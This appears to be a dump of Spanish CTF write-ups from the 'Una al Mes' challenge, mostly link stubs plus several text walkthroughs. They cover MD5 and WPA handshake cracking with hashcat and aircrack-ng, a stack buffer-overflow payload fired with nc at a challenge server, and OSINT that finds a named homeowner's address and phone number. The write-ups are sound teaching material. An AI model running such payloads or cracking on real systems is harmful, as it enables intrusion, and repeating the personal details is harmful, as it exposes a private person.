43 | Al ver que se tratan de largas cadenas de texto repetidas en vez de pequeños grupos de caracteres se enfrentan estos bloques en lineas diferentes y se aprecia una diferencia en una línea intermedia que es más larga porque contiene un texto diferente a su mitad aproximadamente.
44 | 
45 | En donde el resto de líneas contiene el texto: "GVtCktleSBuYW1lOiBNUnhO" la larga tiene "[448333920e12dc9fd9c5e8c30e6b1ea2]:[b3f894165d6166da47d52ffbf77b5d87]"
46 | 
47 | Aparentemente las cadenas serían hash de 32 bits, concretamente serían en MD5, pero se confirma a través de https://www.onlinehashcrack.com/hash-identification.php.
48 | 
49 | Se encuentra el match en texto claro de esos hash con la herramienta online https://crackstation.net/
50 | 
51 | Hash	Type	Result
52 | 448333920e12dc9fd9c5e8c30e6b1ea2	md5	Gilfoyle
53 | b3f894165d6166da47d52ffbf77b5d87	md5	Satan
54 | 
55 | Usuario: Gilfoyle (que se trata del afortunado que no vio destruirse su disco duro)
56 | Contraseña: Satan (que pega bastante bien con el personaje)
57 | 
58 | Accedemos a la web indicada en el enunciado http://34.247.69.86/siliconvalley/episodio1/login.php e introducimos las credenciales descubiertas.
59 | 
60 | Devuelve el siguiente texto con un enlace "Denuncia recibida: https://drive.google.com/open?id=10iguWjRmx3mB0Y4g9iRrJOIXZ1HIJ_zC"
61 | Se descarga tratándose de una imagen JFIF/JPEG con una diligencia previa a un procedimiento judicial y que curiosamente han tapado los datos confidenciales (está vez si lo han hecho bien no como con la sentencia de "La manada").
62 | Siendo JFIF un formato de imagen que no permite capas ni transparencias se asume que de la parte gráfica en sí no se podrá extraer más información por que se intenta buscar en los metadatos.
63 | Directamente en un primer intento se abre la imagen con la herramienta HxD y en las primeras lineas conformada en formato XML ya aparece una etiqueta interesante: "<Iptc4xmpCore:Location>37.436712, -122.137837</Iptc4xmpCore:Location>"
64 | 
65 | Se introducen las coordenadas geográficas en Google Maps y nos señala una casa en la calle Webster St. en Palo Alto y que a primera vista su dueño no debería tener ninguna envidia de Richard y sus compañeros porque se gasta una muy buena casa y piscina.
66 | Bajando a Street View conseguimos ver el letrero del número de la casa: 2126.
67 | 
68 | (Aquí como malentendido con el enuncionado seguimos buscando el número de teléfono de la casa y no el de la propia vivienda...)
69 | En varias paginas inmobiliarias se confirma que un servidor no podra permitirse esa casa ni con el salario de varias vidas... pero también en www.whitepages.com se observa que el dueño de la casa es William Nisley Neidig y en esa misma página se encuentra el número de teléfono del propietario (650) 328-2126.
70 | 
71 | Siguiendo el formato a entregar como flag descrito en el enunciado (en md5 - se utiliza https://passwordsgenerator.net/md5-hash-generator/), se prueba las siguientes flags todas sin éxito.
72 | 1-650-328-2126 => UAM{2b895dfd62750a9b841e1cda0cf3d690}
73 | (650) 328-2126 => UAM{34e955fa369d1c4417e8c7200a9ab2a4}
74 | 16503282126 => UAM{49c38af0aa2dbc8107511f205ea38bff}
75 | 6503282126 => UAM{da1ec48a01b7e2af0a5855bdd25b174f}
76 | 
77 | Se relee el enunciado, se golpea uno contra la pared y se introduce como flag el número de la vivienda en hash md5.
78 | 2126 => UAM{3b92d18aa7a6176dd37d372bc2f1eb71}
79 | 


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/tonicastillo/tonicastillo-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/tonicastillo/tonicastillo-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/1v4n/1v4n-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/1v4n/1v4n-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/arsenics/arsenics-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/arsenics/arsenics-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/bicacaro/bicacaro-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/bicacaro/bicacaro-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/darkeagle/darkeagle-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/j0n3/j0n3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/j0n3/j0n3-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/nachinho3/nachinho3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/nachinho3/nachinho3-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/rafamartos/rafamartos-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/rafamartos/rafamartos-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/1v4n/1v4n-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/1v4n/1v4n-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/bicacaro/bicacaro-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/darkeagle/darkeagle-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/j0n3/j0n3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/j0n3/j0n3-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/nachinho3/nachinho3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/nachinho3/nachinho3-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/rafamartos/rafamartos-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/rafamartos/rafamartos-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/darkeagle/DarkEagle-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/darkeagle/DarkEagle-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/j0n3/j0n3-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/j0n3/j0n3-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/julianjm/julianjm-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/julianjm/julianjm-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/nachinho3/nachinho3-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/nachinho3/nachinho3-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/oreos/oreos-episodio1-2.txt:
--------------------------------------------------------------------------------
  1 | UNA AL MES (Diciembre 2018)
  2 | **************************************************************************
  3 | 
  4 | Categoría: Universo Marvel
  5 | Episodio: 1 - 2ª Parte
  6 | 
  7 | --------------------------------------------------------------------------
  8 | 
  9 | 1. Descargamos el fichero adjunto de https://drive.google.com/open?id=1Hbo8lqq9QPAJGNCRM4aE5jHcZhILuGTN
 10 | 
 11 | 2. Una vez descargado, lo descomprimimos:
 12 | 
 13 | oreos# unzip image.zip
 14 | 
 15 | Obtenemos un fichero image.raw con un dump.
 16 | 
 17 | 3. Lanzamos volatility para averiguar el tipo de sistema operativo.
 18 | 
 19 | oreos# volatility -f image.raw imageinfo
 20 | Volatility Foundation Volatility Framework 2.6
 21 | INFO    : volatility.debug    : Determining profile based on KDBG search...
 22 |           Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
 23 |                      AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
 24 |                      AS Layer2 : FileAddressSpace (/root/uam/marvell/ep2/image.raw)
 25 |                       PAE type : No PAE
 26 |                            DTB : 0x187000L
 27 |                           KDBG : 0xf80002c08070L
 28 |           Number of Processors : 1
 29 |      Image Type (Service Pack) : 0
 30 |                 KPCR for CPU 0 : 0xfffff80002c09d00L
 31 |              KUSER_SHARED_DATA : 0xfffff78000000000L
 32 |            Image date and time : 2018-12-20 15:48:02 UTC+0000
 33 |      Image local date and time : 2018-12-20 16:48:02 +0100
 34 | 
 35 | El perfil de sistema operativo a usar es Win7SP1x64.
 36 | 
 37 | 4. Listamos los ficheros para el usuario 'admin'
 38 | 
 39 | oreos# volatility -f image.raw --profile=Win7SP1x64 filescan | grep "admin"
 40 | 
 41 | Observamos algunos ficheros interesantes en el escritorio:
 42 |  1 - flag.txt
 43 |  2 - HydralarioHydra
 44 |  3 - netcat... 
 45 | 
 46 | Hacemos un dump de los ficheros 1) y 2):
 47 | 
 48 | oreos# volatility -f image.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000013dfcb730 -D .
 49 | oreos# volatility -f image.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000013d563f20 -D .
 50 | 
 51 | Cambiamos el nombre a los ficheros:
 52 | 
 53 | oreos# mv file.None.0xfffffa80066d6d00.dat flag.txt
 54 | oreos# mv file.None.0xfffffa80089e01c0.dat HydralarioHydra
 55 | 
 56 | Los ficheros son:
 57 |  - flag.txt: ASCII text, with no line terminators
 58 |  - HydralarioHydra: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c03cee4c7f44b1055031fd53980bd22e47873ab1, not stripped
 59 | 
 60 | 
 61 | 5. Tras analizar el binario y el fichero flag.txt, observamos lo siguiente:
 62 | 
 63 | a. La función read_flag lee el contenido de flag.txt y lo almacena en una variable "flag" en la posición de memoria 0x084160A0
 64 | 
 65 | int read_flag()
 66 | {
 67 |   int v1; // [esp+0h] [ebp-18h]
 68 |   char *src; // [esp+4h] [ebp-14h]
 69 |   int v3; // [esp+8h] [ebp-10h]
 70 |   FILE *stream; // [esp+Ch] [ebp-Ch]
 71 | 
 72 |   src = 0;
 73 |   v1 = 0;
 74 |   stream = fopen("flag.txt", "r");
 75 |   if ( !stream )
 76 |   {
 77 |     printf("\nError leyendo fichero flag.txt");
 78 |     exit(1);
 79 |   }
 80 |   v3 = getline(&src, &v1, stream);
 81 |   if ( v3 == -1 )
 82 |     exit(1);
 83 |   strcpy(flag, src);
 84 |   return fclose(stream);
 85 | }
 86 | 
 87 | .bss:084160A0 flag            db 0C0h dup(?)          ; DATA XREF: read_flag+8E↑o
 88 | 
 89 | b. La función check_age comprueba el primer valor introducido por el usuario. Deberemos introducir el valor 0 para que la función devuelva el valor 1 (comparación final). Para conseguir un valor 0 que esté comprendido entre 9 <= <valor> < 99999, deberemos provocar un desbordamiento. Para ello, insertaremos el valor 65536, el cual desbordará e insertará un valor 0 (tipo de v2 == int16 == 2^16bits == 65535.
 90 | 
 91 | _BOOL4 check_age()
 92 | {
 93 |   int v1; // [esp+8h] [ebp-10h]
 94 |   __int16 v2; // [esp+Eh] [ebp-Ah]
 95 | 
 96 |   __isoc99_scanf((const char *)&unk_84144D0, &v1);
 97 |   if ( v1 > 99999 || v1 <= 9 )
 98 |     return 0;
 99 |   v2 = v1;
100 |   printf("\nEdad: %d", (unsigned __int16)v1);
101 |   return v2 == 0;
102 | }
103 | 
104 | Insertando el valor 65536 conseguimos saltar la primera prueba:
105 | 
106 | oreos# python -c 'print("65536\n")' | ./HydralarioHydra
107 | 
108 | 
109 | Bienvenido al sistema de reclutamiento de agentes.
110 | ¡Veamos si tienes lo que hay que tener para ser parte de Hydra!
111 | 
112 | Edad: 0
113 | Parece que tienes madera de agente... hagamos una ultima comprobacion...
114 | Cuentame el secreto y yo te contare el mio: 
115 | 
116 | c. La función tell_me_a_secret lee un valor de entrada. En este caso, aprovecharemos un buffer overflow.
117 | 
118 | int tell_me_a_secret()
119 | {
120 |   char v1; // [esp+8h] [ebp-10h]
121 | 
122 |   printf("\nCuentame el secreto y yo te contare el mio: ");
123 |   return __isoc99_scanf("%s", &v1);
124 | }
125 | 
126 | python -c 'print("65536\n" + "A"*20 + "ABCD")' | strace ./HydralarioHydra
127 | 
128 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x44434241} ---
129 | 
130 | Observamos el buffer overflow para un buffer de 20 caractéres. Por lo tanto, aprovecharemos para introducir en el stack la llamada a la función que nos permita imprimir la flag. La función oculta "a", nos permite imprimir un valor pasado por parámetro. Invocaremos la llamada a dicha función, e insertaremos por parámetro el valor de la variable flag del paso a).
131 | 
132 | int __cdecl a(char *format)
133 | {
134 |   puts("\nBuen trabajo!");
135 |   printf(format);
136 |   return printf("\nAgente!");
137 | }
138 | 
139 | oreos# readelf -a HydralarioHydra  | grep FUNC
140 |      1: 00000000     0 FUNC    GLOBAL DEFAULT  UND getline@GLIBC_2.0 (2)
141 |      2: 00000000     0 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.0 (2)
142 |      3: 00000000     0 FUNC    GLOBAL DEFAULT  UND fclose@GLIBC_2.1 (3)
143 |      4: 00000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.0 (2)
144 |      5: 00000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.0 (2)
145 |      7: 00000000     0 FUNC    GLOBAL DEFAULT  UND exit@GLIBC_2.0 (2)
146 |      8: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)
147 |      9: 00000000     0 FUNC    GLOBAL DEFAULT  UND fopen@GLIBC_2.1 (3)
148 |     10: 00000000     0 FUNC    GLOBAL DEFAULT  UND __isoc99_scanf@GLIBC_2.7 (4)
149 |     28: 08414160     0 FUNC    LOCAL  DEFAULT    1 deregister_tm_clones
150 |     29: 084141a0     0 FUNC    LOCAL  DEFAULT    1 register_tm_clones
151 |     30: 084141e0     0 FUNC    LOCAL  DEFAULT    1 __do_global_dtors_aux
152 |     33: 08414210     0 FUNC    LOCAL  DEFAULT    1 frame_dummy
153 |     44: 084144b0     2 FUNC    GLOBAL DEFAULT    1 __libc_csu_fini
154 |     45: 00000000     0 FUNC    GLOBAL DEFAULT  UND getline@@GLIBC_2.0
155 |     46: 08414150     4 FUNC    GLOBAL HIDDEN     1 __x86.get_pc_thunk.bx
156 |     48: 00000000     0 FUNC    GLOBAL DEFAULT  UND printf@@GLIBC_2.0
157 |     49: 0841428d    64 FUNC    GLOBAL DEFAULT    1 tell_me_a_secret
158 |     51: 00000000     0 FUNC    GLOBAL DEFAULT  UND fclose@@GLIBC_2.1
159 |     52: 084144b4     0 FUNC    GLOBAL DEFAULT   15 _fini
160 |     54: 00000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@@GLIBC_2.0
161 |     56: 00000000     0 FUNC    GLOBAL DEFAULT  UND puts@@GLIBC_2.0
162 |     58: 00000000     0 FUNC    GLOBAL DEFAULT  UND exit@@GLIBC_2.0
163 |     61: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@@GLIBC_
164 |     62: 08414450    93 FUNC    GLOBAL DEFAULT    1 __libc_csu_init
165 |     63: 00000000     0 FUNC    GLOBAL DEFAULT  UND fopen@@GLIBC_2.1
166 |     64: 08414216   119 FUNC    GLOBAL DEFAULT    1 check_age
167 |     66: 08414140     2 FUNC    GLOBAL HIDDEN     1 _dl_relocate_static_pie
168 |     67: 08414100     0 FUNC    GLOBAL DEFAULT    1 _start
169 |     69: 084142cd    74 FUNC    GLOBAL DEFAULT    1 a
170 |     71: 084143c8   129 FUNC    GLOBAL DEFAULT    1 main
171 |     72: 00000000     0 FUNC    GLOBAL DEFAULT  UND __isoc99_scanf@@GLIBC_2.7
172 |     75: 080483ec     0 FUNC    GLOBAL DEFAULT   12 _init
173 |     76: 08414317   177 FUNC    GLOBAL DEFAULT    1 read_flag
174 | 
175 | La función "a" se encuentra en la dirección 0x084142cd. Nuestro payload quedará de la siguiente forma:
176 | 
177 | "\xCD\x42\x41\x08" + "\x00\x00\x00\x00" + "\xA0\x60\x41\x08", cuyo llamada completa sería:
178 | 
179 | python -c 'print("65536\n" + "A"*20 + "\xCD\x42\x41\x08" + "\x00\x00\x00\x00" + "\xA0\x60\x41\x08")' | ./HydralarioHydra
180 | 
181 | Bienvenido al sistema de reclutamiento de agentes.
182 | ¡Veamos si tienes lo que hay que tener para ser parte de Hydra!
183 | 
184 | Edad: 0
185 | Parece que tienes madera de agente... hagamos una ultima comprobacion...
186 | Cuentame el secreto y yo te contare el mio: 
187 | Buen trabajo!
188 | UAM{EstaNoEsLaFlag}
189 | Violación de segmento
190 | 
191 | El contenido del fichero flag.txt se imprime.
192 | 
193 | 6. Una vez resuelto en local, localizaremos el servicio remoto donde realizaremos el exploiting para obtener la flag. Para ello, volvemos a usar volatility nuevamente:
194 | 
195 | oreos# volatility -f image.raw --profile=Win7SP1x64 netscan
196 | 
197 | ....
198 | 0x13d880880        TCPv4    172.16.233.139:49166           34.247.69.86:9009    ESTABLISHED      1940     nc64.exe 
199 | ....
200 | 
201 | El servicio donde está corriendo la aplicación es 34.247.69.86:9009. Usaremos netcat para explotar el servicio.
202 | 
203 | 7. Explotamos el servicio con el siguiente comando:
204 | 
205 | oreos# python -c 'print("65536\n" + "A"*20 + "\xCD\x42\x41\x08" + "\x00\x00\x00\x00" + "\xA0\x60\x41\x08")' | nc 34.247.69.86 9009
206 | 65536
207 | AAAAAAAAAAAAAAAAAAAA�BA^H^@^@^@^@�`A^H
208 | 
209 | Bienvenido al sistema de reclutamiento de agentes.
210 | ¡Veamos si tienes lo que hay que tener para ser parte de Hydra!
211 | 
212 | Edad: 0
213 | Parece que tienes madera de agente... hagamos una ultima comprobacion...
214 | Cuentame el secreto y yo te contare el mio: 
215 | Buen trabajo!
216 | UAM{f2d593fa4eb0cd1860ed80fb0f7236ca}
217 | 
218 | 8. Obtenemos la flag:
219 | 
220 | UAM{f2d593fa4eb0cd1860ed80fb0f7236ca}
221 | 


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/socialkas/socialkas-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/socialkas/socialkas-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/1v4n/1v4n-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/1v4n/1v4n-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/arsenics/arsenics-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/arsenics/arsenics-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/bicacaro/bicacaro-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/darkeagle/DarkEagle-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/darkeagle/DarkEagle-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/j0n3/j0n3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/j0n3/j0n3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/julianjm/julianjm-episodio1.txt:
--------------------------------------------------------------------------------
 1 | WRITEUP UNIVERSO MARVEL - Episodio 1 - 1ª parte
 2 | ===============================================
 3 | 
 4 | Partimos de un fichero .pcap con una captura de datos wifi 802.11. Vemos que tenemos un hasdshake WPA, así que pasamos al ataque por diccionario y le pasamos el rockyou.txt.
 5 | 
 6 | Aquí tenemos dos opciones, usar el aircrack-ng, que usa CPU y con el que conseguimos (en mi equipo) unas 4.000 claves por segundo y tardamos 20minutos, o bien usar hashcat, que permite el uso de la GPU que tengamos y que multiplica por 35 la velocidad, reduciendo el tiempo de crackeo a unos 50 segundos.
 7 | 
 8 | $ aircrack-ng capture-01.cap -w rockyou.txt
 9 | 
10 | $ cap2hccapx.bin capture-01.cap output.hccap
11 | $ hashcat-5.1.0/hashcat64.bin -m 2500 output.hccap rockyou.txt
12 | 
13 | 
14 | Obtenemos que la clave para la red "Hydra Corp" es hydra54321. Desciframos el pcap para luego analizarlo en wireshark:
15 | 
16 | $ airdecap-ng -p hydra54321 -e "Hydra Corp" capture-01.cap
17 | 
18 | 
19 | Analizando el fichero generado (capture-01-dec.cap), vemos que hay peticiones a la web http://34.247.69.86/universomarvel/episodio1. Abrimos esa web en el navegador y comprobamos que podemos entrar con cualquier email y contraseña. La web tiene varios apartados, estando uno de ellos inaccesible (Ubicación de la base).
20 | Analizando las peticiones que se generan al pinchar cada enlace, vemos que todas llaman al script database.php?load=ALGO_EN_BASE32. Ese parámetro load contiene las palabras dashboard,calendario,misiones y mapas, codificados en base32.
21 | 
22 | Después de trastear un rato, nos damos cuenta que al hacer una llamada a ese script sin cookies (concretamente sin el cookie de sesión), en lugar de código html nos devuelve un texto codificado en rot13 y posteriormente en base64. Este texto coincide con el que vemos desde el analizador de red del navegador.
23 | 
24 | Haciendo la petición al recurso 'mapas', vemos que, en lugar de error, también recibimos un base64 que después de pasarle el rot13 nos queda así:
25 | 
26 | $ curl -s 'http://34.247.69.86/universomarvel/episodio1/databases.php?load=NVQXAYLT' | base64 -d | rot13
27 | {"Ubicaciones": {
28 | 	    "Base Principal": { 
29 | 	        "Nombre": "Isla Hydra",
30 | 	        "Coords": "37°21′N 23°28′E",
31 | 	    },
32 | 	    "Base Secreta": {
33 | 	        "Nombre": "Flag",
34 | 	        "Coords": "UAM{46863d92858b486c29f759767e53e92f}",
35 | 	    }
36 | 	}
37 | 
38 | Y ahí tenemos la flag.
39 | 
40 | 
41 | Julián J. M.
42 | julianjm@gmail.com
43 | Telegram: @julianjm
44 | 


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/masi/masi-episodio1.txt:
--------------------------------------------------------------------------------
  1 | -------------------------------------------------------------------------------
  2 | WRITE-UP UAM UNIVERSO-MARVEL EPISODIO 1 - PARTE 1
  3 | -------------------------------------------------------------------------------
  4 | 
  5 |  ███▄ ▄███▓ ▄▄▄        ██████  ██▓
  6 | ▓██▒▀█▀ ██▒▒████▄    ▒██    ▒ ▓██▒
  7 | ▓██    ▓██░▒██  ▀█▄  ░ ▓██▄   ▒██▒
  8 | ▒██    ▒██ ░██▄▄▄▄██   ▒   ██▒░██░
  9 | ▒██▒   ░██▒ ▓█   ▓██▒▒██████▒▒░██░
 10 | ░ ▒░   ░  ░ ▒▒   ▓▒█░▒ ▒▓▒ ▒ ░░▓  
 11 | ░  ░      ░  ▒   ▒▒ ░░ ░▒  ░ ░ ▒ ░
 12 | ░      ░     ░   ▒   ░  ░  ░   ▒ ░
 13 |        ░         ░  ░      ░   ░  
 14 | Twitter: @masi_c64
 15 | -------------------------------------------------------------------------------
 16 | -------------------------------------------------------------------------------
 17 | 
 18 | EPISODIO 1 - 1ª PARTE
 19 | Misión:
 20 | El agente Coulson ha capturado una trama de comunicación de una base de Hydra.
 21 | Tu objetivo será analizarla para descubrir la ubicación de la base secreta donde Hydra mantiene oculta su base de operaciones especiales.
 22 | Buena suerte, el éxito de nuestra misión depende de ti.
 23 | Nick Furia.
 24 | Enlace de descarga de la trama: https://drive.google.com/open?id=1ltE42DQvMe-q_qVBbgeKQXvvTEiRyhwq
 25 | Info: La flag tiene el formato UAM{md5}
 26 | 
 27 | -------------------------------------------------------------------------------
 28 | -------------------------------------------------------------------------------
 29 | 
 30 | Descargamos el cap y lo convertimos a hccapx para prepararlo para el hashcat, con la herramienta online:
 31 | https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
 32 | 
 33 | Lanzamos el hashcat y si hacemos un checkpoint para seguir más tarder utilizamos --restore, para continuar:
 34 | hashcat -m 2500 uam-um-01.hccapx /usr/share/wordlists/rockyou.txt --force
 35 | hashcat --restore
 36 | 
 37 | Resultado:
 38 | 463b8a83cc1f44e6d6da50cbaa3992a6:e0915345eadd:f0421c95e8ae:Hydra Corp:hydra54321
 39 |                                                  
 40 | Session..........: hashcat
 41 | Status...........: Cracked
 42 | Hash.Type........: WPA/WPA2
 43 | Hash.Target......: Hydra Corp (AP:e0:91:53:45:ea:dd STA:f0:42:1c:95:e8:ae)
 44 | Time.Started.....: Sat Dec 15 15:08:25 2018 (33 mins, 3 secs)
 45 | Time.Estimated...: Sat Dec 15 15:41:28 2018 (0 secs)
 46 | 
 47 | desecriptamos los mensajes del cap según:
 48 | https://wiki.wireshark.org/HowToDecrypt802.11
 49 | 
 50 | generamos en wpa-psk online:http://jorisvr.nl/wpapsk.html
 51 | HEX: 7fb1ae7fbbf1a7af5ed51bd3171fe7619c5f545844cd575ca8b8b00ef61e3b62
 52 | 
 53 | Vemos paquetes de la dirección 192.168.105.190 a la dirección 34.247.69.86, haciendo un GET /universomarvel/episodio1 HTTP/1.1
 54 | 0000   47 45 54 20 2f 75 6e 69 76 65 72 73 6f 6d 61 72   GET /universomar
 55 | 0010   76 65 6c 2f 65 70 69 73 6f 64 69 6f 31 20 48 54   vel/episodio1 HT
 56 | 0020   54 50 2f 31 2e 31 0d 0a                           TP/1.1..
 57 | 
 58 | En http://34.247.69.86/universomarvel/ hay un test.html con un "He", pero no parece que podamos hacer nada con él.
 59 | En http://34.247.69.86/universomarvel/episodio1/ aparece un login.html que nos pide usuario y contraseña.
 60 | 	ponemos cualquier cosa en login pass y entramos:
 61 | 	masi@masi.uam
 62 | 	password
 63 | 
 64 | Damos vueltas por los links y vemos que las peticiones del link tienen una llamada especial, y que el último link que es el que nos interesa, nos dá un error: "No tienes permisos para ver las ubicaciones".
 65 | 
 66 | Vamos al burp para ir capturando las peticiones.
 67 | 
 68 | BURP:
 69 | En el portal de hydra comprobamos las peticiones:
 70 | 
 71 | GET /universomarvel/episodio1/databases.php?load=NVQXAYLT HTTP/1.1
 72 | Host: 34.247.69.86
 73 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
 74 | Accept: text/html, */*; q=0.01
 75 | Accept-Language: en-US,en;q=0.5
 76 | Accept-Encoding: gzip, deflate
 77 | X-Requested-With: XMLHttpRequest
 78 | Referer: http://34.247.69.86/universomarvel/episodio1/panel.php
 79 | Cookie: PHPSESSID=vrtjgr77bj605ha7bmfi31b6f6
 80 | Connection: close
 81 | 
 82 | 
 83 | Estos son los posibles valores del menú del admin panel:
 84 | 	Dashboard: MRQXG2DCN5QXEZA=
 85 | 	Calendario: MNQWYZLOMRQXE2LP
 86 | 	Misiones: NVUXG2LPNZSXG===
 87 | 	Ubicacion de la base: NVQXAYLT
 88 | 
